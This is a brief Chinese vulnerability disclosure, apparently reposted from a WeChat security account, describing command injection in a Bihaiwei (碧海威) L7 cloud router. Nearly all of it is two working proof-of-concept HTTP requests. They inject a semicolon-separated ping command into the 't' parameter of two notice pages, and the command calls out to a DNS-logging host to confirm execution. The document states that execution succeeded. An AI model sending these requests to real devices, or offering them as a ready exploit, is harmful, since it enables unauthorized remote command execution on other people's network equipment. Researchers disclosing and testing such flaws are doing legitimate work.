漏洞参数:t
漏洞详情:
1、打开自己的服务
2、使用以下poc进行检测
POC:
GET /notice/confirm.php?t=;ping%20cnslog.eyes.sh HTTP/1.1
Host: 127.0.0.1:1443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
POC2:
GET /notice/jumper.php?t=;ping%20cnslog.eyes.sh HTTP/1.1
Host: 127.0.0.1:1443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
3、检查dnslog是否接收到请求
执行成功
END
原文始发于微信公众号(小羊安全屋):【命令执行】碧海威科技-L7云路由
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论